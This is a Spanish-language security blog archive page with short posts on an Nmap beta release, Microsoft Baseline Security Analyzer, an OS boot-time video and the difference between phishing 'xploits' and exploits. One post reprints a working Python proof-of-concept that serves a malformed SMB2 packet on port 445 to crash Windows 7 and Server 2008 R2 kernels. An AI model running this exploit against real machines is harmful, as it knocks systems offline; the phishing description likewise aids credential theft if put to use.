Archives for 

vista

NMAP 5.1 Beta disponible para descargar.

Esta entrada es para todas aquellas personas “gomosas” de las nuevas versiones y que además saben de qué se trata NMAP.

En Rincon Informático hemos hablado un poco sobre esta herramienta de la que cualquier persona interesada en Seguridad informática debiera conocer.

Esta nueva versión (que se encuentra en pruebas) trae consigo (como bien acostumbrados nos tiene la gente de Insecure.ORG) novedades muy interesantes como por ejemplo un Script que chequea si la “victima” soporte SMBv2 para poder explotar cierto problema que tienen algunos Sistemas Operativos.

En total son más de 14 nuevos Scripts (NSE), descubrimiento efectivo sobre puertos UDP y más de 100 cambios entre los que se encuentras los de desempeño y los errores de programación corregidos.

Dejo los respectivos enlaces de descarga, documentación y demás.

Nmap 5.10 Beta 1 Released

Documentación

Descarga

Nueva vulnerabilidad en Windows 7 y Windows 2008 server

Leyendo los feeds  me encuentro con esta noticia, se trata de un nuevo fallo en el sistema operativo de moda: Windows 7

Este bug permite  a los atacantes  bloquear la maquina victima lo cual  obliga a  reiniciar para tener otra vez control sobre la misma. En la pagina del investigador que dio a conocer el fallo (Laurent Gaffi)  explica  como funciona esta vulnerabilidad la cual se encuentra nuevamente en el protocolo SMB,  y afirma que no es posible la ejecucion de codigo remoto, ya que  el codigo de explotacion afecta al kernel de Windows 7 y Windows Server 2008 R2, disparando un bucle infinito.

Comparto el codigo de explotacion:

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

class SMB2(SocketServer.BaseRequestHandler):

 def handle(self):

 print "Who:", self.client_address
 print "THANKS SDL"
 input = self.request.recv(1024)
 self.request.send(packet)
 self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

Que raro que el protocolo SMB este presentando tantos problemas de seguridad,  ya que anteriormente  se han hecho publicos algunos fallos que afectan este mismo  protocolo como  la vulnerabilidad  BSOD  (pantallazo azul) que afectaba a Windows Vista, Windows 7 y Windows server 2008

Entre Windows y Ubuntu cual carga en menos tiempo??? averigualo!!

Leyendo algunos tweets me encuentro en este sitio, un vídeo muy interesante el cual nos muestra una computación, entre Microsoft y  GNU/Linux  la competencia tiene 2 bandos por cada lado, en el lado del mal participan Windows Vista, y el recién salido del Horno  Windows 7, mientras que por GNU/Linux participan Ubuntu 9.04 y el nuevo consentido Ubuntu 9.10

La idea del reto es bastante sencillo, el primero sistema operativo en arrancar… ¿Quien ganara? Hagan sus apuestas!!!!

Microsoft Baseline Security Analyzer versión 2.1.1

Microsoft en su intento por dominar el mundo intenta hacer software para todas las necesidades de los informáticos.  En esta ocasión presentan una actualización de su aplicación de administración de vulnerabilidades Microsoft Baseline Security Analyzer (MBSA).

Puede ser que no sea la mejor (de hecho no lo es) pero para las personas que quieren empezar a conocer de que se trata las vulnerabilidades o que desean hacer un muy rápido vistazo de su red esta herramienta puede que le ayude a examinar de manera superficial y así hacerse a una idea de la seguridad en su entorno.

Es una herramienta gratis que incluye interface tanto grafica como de línea de comandos (poco a poco Microsoft entiende de esta necesidad).  MBSA no está en nuestro idioma, pero realmente no es un inconveniente pues que como siempre es muy intuitivo, hecho a prueba de…

Tiene cosas malas como que necesita conectarse a internet para descargar las “recomendaciones” de Microsoft, solo funciona obviamente para “escanear” maquinas que ejecuten sistemas operativos de Microsoft.

NOTA: MBSA NO es una herramienta profesional y probablemente NUNCA lo sea.  Sin embargo para las personas que DESEAN EMPEZAR pueden hacerlo con este software.

FAQ de MBSA.

Página de descarga.

Diferencia entre Xploits y Exploits

Mucha gente tiende a confundir los términos exploits y xploits o  creen que significan lo mismo, sin embargo,   aunque se escriban casi de la misma forma tienen grandes diferencias de carácter conceptual. En esta oportunidad quiero explicarles desde mi punto de vista: que es un y un Xploit, para que podamos ver claramente las diferencias que hay entre ellos y de esta forma no volver a confundirlos.

¿Que es Xploit?

Un Xploit son  las conocidas  y famosas postales de gusanito falsas, que su función es  crear una pagina idéntica a la de hotmail,gmail, yahoo, facebook, etc,  para que los usuarios  digiten allí su password. El procedimiento es sencillo. A la víctima le llega un correo diciendo que alguna persona (puede ser conocida o no) le mando una tarjeta postal, la víctima  por curiosidad abre el correo y este dice que para abrir la postal debe dar click en un enlace, sin embargo este enlace es falso y lo que hace es abrir el formulario idéntico de hotmail (o de otro servicio de correo)  creado por el atacante. Estando allí, la víctima simplemente cree que se le cerro hotmail y vuelve a escribir la contraseña sin saber que ese formulario es falso.

¿Que es ?

Un es un programa que logra explotar  un bug o fallo de algún programa o hardware, causando que este funcione de tal forma que no fue pensado en un comienzo,  Dichos programas son hechos generalmente en C, perl, python, ruby, php y su función generalmente es violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de otros ataques a terceros.

Espero que haya quedado un poco mas claro las diferencias que hay entre,  un termino y el otro,  y  si alguien no esta de acuerdo con lo expuesto, con gusto lo invito a que me  diga desde su punto de vista  cual es la diferencia entre estos dos términos.